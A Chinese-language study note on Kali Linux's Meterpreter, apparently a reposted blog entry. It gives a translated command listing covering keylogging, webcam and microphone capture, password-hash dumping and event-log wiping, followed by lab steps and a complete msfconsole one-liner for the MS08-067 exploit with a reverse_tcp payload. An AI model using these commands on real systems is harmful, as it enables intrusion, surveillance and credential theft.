kali linux之Meterpreter
高级,动态,可扩展的payload
基于meterpreter上下文利用更多漏洞发起攻击,后渗透阶段一站式操作界面
完全基于内存的dll注入式payload(不写硬盘)
注入合法系统进程并建立stager
基于stager上传和预加载dll进行扩展模块的注入(客户端api)
基于stager建立的socket连接建立加密的TLS/1.0通信隧道
利用TLS隧道进一步加载后续扩展模块(避免网络取证)
服务端使用C语言编写
客户端提供基于ruby的全特性api(支持任何语言)
meterpreter>帮助
核心命令
=============
命令描述
------- -----------
? 帮助菜单
background 回到当前会话
bg 别名为背景
bgkill 杀死背景meterpreter脚本
bglist 列出运行后台脚本
bgrun 在后台执行一个meterpreter脚本
channel 显示信息或控制活动通道
close 关闭频道
disable_unicode_encoding 禁用unicode字符串的编码
enable_unicode_encoding 启用unicode字符串的编码
exit 终止meterpreter会话
get_timeouts 获取当前会话超时值
guid 获取会话GUID
help 帮助菜单
info 显示有关Post模块的信息
irb 在当前会话中打开交互式Ruby shell
load 加载一个或多个meterpreter扩展
machine_id 获取附加到会话的计算机的MSF ID
migrate 将服务器迁移到另一个进程
pivot 管理数据透视侦听器
pry 在当前会话中打开Pry调试器
quit 终止meterpreter会话
read 从通道读取数据
resource 运行存储在文件中的命令
run 执行meterpreter脚本或Post模块
sessions 快速切换到另一个会话
set_timeouts 设置当前会话超时值
sleep 强制Meterpreter安静,然后重新建立会话。
transport 更改当前的传输机制
use 不推荐使用的别名“load”
uuid 获取当前会话的UUID
write 将数据写入通道
Stdapi:文件系统命令
============================
命令描述
------- -----------
cat 将文件内容读入屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
dir 列表文件(ls的别名)
download 下载文件或目录
edit 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 制作目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定的文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
Stdapi:网络命令
===========================
命令描述
------- -----------
arp 显示主机ARP缓存
getproxy 显示当前的代理配置
ifconfig 显示接口
ipconfig 显示接口
netstat 显示网络连接
portfwd 将本地端口转发到远程服务
resolve 解析目标上的一组主机名
route 查看和修改路由表
Stdapi:系统命令
=======================
命令描述
------- -----------
clearev 清除事件日志
drop_token 放弃任何活动的模拟令牌。
execute 执行命令
getenv 获取一个或多个环境变量值
getpid 获取当前进程标识符
getprivs 尝试启用当前进程可用的所有权限
getsid 获取运行服务器的用户的SID
getuid 获取服务器正在运行的用户
kill 终止进程
localtime 显示目标系统的本地日期和时间
pgrep 按名称过滤进程
pkill 按名称终止进程
ps 列出正在运行的进程
reboot 重新启动远程计算机
reg 修改远程注册表并与之交互
rev2self 在远程计算机上调用RevertToSelf()
shell 进入系统命令shell
shutdown 关闭远程计算机
steal_token 尝试从目标进程中窃取模拟令牌
suspend 暂停或恢复进程列表
sysinfo 关于远程系统的信息,例如OS
Stdapi:用户界面命令
===============================
命令描述
------- -----------
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_sto 停止捕获击键
screenshot 获取交互式桌面的屏幕截图
setdesktop 更改meterpreters当前桌面
uictl 控制一些用户界面组件
Stdapi:网络摄像头命令
=======================
命令描述
------- -----------
record_mic 从默认麦克风录制音频X秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放指定网络摄像头的视频流
Stdapi:音频输出命令
=============================
命令描述
------- -----------
play 播放在目标系统上播放音频文件,没有写在磁盘上
Priv:提升命令
======================
命令描述
------- -----------
getsystem 尝试将您的权限提升为本地系统的权限。
Priv:密码数据库命令
================================
命令描述
------- -----------
hashdump 转储SAM数据库的内容
Priv:Timestomp命令
========================
命令描述
------- -----------
timestomp 操作文件MACE属性
查看系统
查看文件及文件夹
列出进程
更改文件名字
在后台运行一个进程
先查看本机文件
然后上传一个文件到目标上
使用vnc
删除所有日志
下载目标的文件
先ps 列出进程 然后migrate 7636 把自己迁移到id号为7636这个进程里面
下载hash
查看挂载了几个硬盘
搜索某个文件
arp缓存
目标操作系统空闲时间
记录麦克风(我虚拟机没有)
列出主机有几个摄像头(我虚拟机没有)
如果有的话就可以打开摄像头
python扩展---无需运行环境,在客户端运行原生python代码
load导入python扩展,写python代码即可
msfconsole -x(编写脚本时便于引用)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.13;set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.1.12;set LPORT 4444;exploit"
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn
转载于:https://www.cnblogs.com/Hydraxx/p/10490153.html
kali linux之Meterpreter相关推荐
- 利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马. 首先安装Venom Venon克隆地址:https://gi ...
- Kali Linux Web***测试之 WebSploit
WebSploit简介: l 一个综合性的,高级的中间人漏洞***框架. l 由python编写的开源项目. l 源代码:https://github.com/websploit/webs ...
- Kali Linux 安全渗透教程第一更
Kali Linux 安全渗透教程 目录 第1章 Linux安全渗透简介 1.1 什么是安全渗透 1.2 安全渗透所需工具 1.3 Kali Linux简介 1.4 安装Kali Linux ...
- Kali Linux安全渗透教程(内部资料)
Kali Linux安全渗透教程第一章(内部资料) 下载地址://pan.baidu.com/s/1dDnEL4P Kali Linux安全渗透教程第二章(内部资料) 下载地址:://pan.baid ...
- Kali Linux渗透基础知识整理(三):漏洞利用
漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...
- linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录
环境: 攻击机:192.168.200.101 //kali Linux 2020 靶机:192.168.200.103 (未打MS17-010补丁windowsService ...
- kali linux关闭进程,技术|如何使用 Kali Linux 黑掉 Windows
Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具.Metasploit 项目中 Metasploit 框架支持 Kali Linu ...
- Kali Linux 网络扫描秘籍 第八章 自动化 Kali 工具
第八章 自动化 Kali 工具 作者:Justin Hutchens 译者:飞龙 协议:CC BY-NC-SA 4.0 Kali Linux 渗透测试平台提供了大量高效的工具,来完成企业渗透测试中所需 ...
- Kali Linux 秘籍 第六章 漏洞利用
第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识 ...
最新文章
- redisTemplate分布式锁演变、redission分布式锁实现!
- 微软Google思科宣布将资助OpenSSL等开源项目
- 发布或重启线上服务时抖动问题解决方案
- 二维数组||考试成绩统计: 案例描述:有三名同学(张三,李四,王五),在一次考试中的成绩分别如下表,请分别输出三名同学的总成绩
- spark sql 本地调试_干货 | 如何成为大数据Spark高手
- python sklearn.decomposition.PCA 主成分分析, 原理详解
- Failed to install Tomcat7 service 解决
- 叮叮叮 重点之中的python必备英语单词(1)来啦!请记得查收
- H5页面移动端IOS键盘收起焦点错位
- BIM二开获取CAD信息必备Teigha库,TD_Mgd_3.09.dll下载和使用操作步骤
- img标签引入和背景图片引入雪碧图的使用
- Linux防火墙关闭方法
- 好家伙!上天入地混血儿料箱机器人
- 全网征集对六如偈的理解:一切有为法,如梦幻泡影,如露亦如电,应作如是观
- cae分析_CAE有限元分析软件的比较
- matlab矩阵检索、嵌套,矩阵操作笔记
- 自媒体短视频搬运如何伪原创上热门!老司机教你伪原创短视频的做法
- AJAX实例--根据邮政编号动态获取省,市,县三级地区+仿百度搜索下拉提示
- 【硬币计数】基于matlab形态学硬币计数【含Matlab源码 393期】
- phpstudy安装sg11组件_关于SG11加密使用、安装配置说明教程 sg11加密组件安装步骤...
热门文章
- python将文字转换为语音_python实现将文本转换成语音
- 全频音箱与分频音箱各有什么优缺点
- 墨条不如墨汁黑是怎么回事?
- 如何快速解决腿抽筋?
- 盼望的意思是什么,怎么用盼望造句?
- 我发现有的人就活该他赚钱,他们的脑子就是个聚宝盆
- Next, let’s look at the interface
- [leetcode]求数组的第k个最大值,python快排解法
- configure报错C compiler cannot create executables
- sql server权限_保护SQL Server审核的访问权限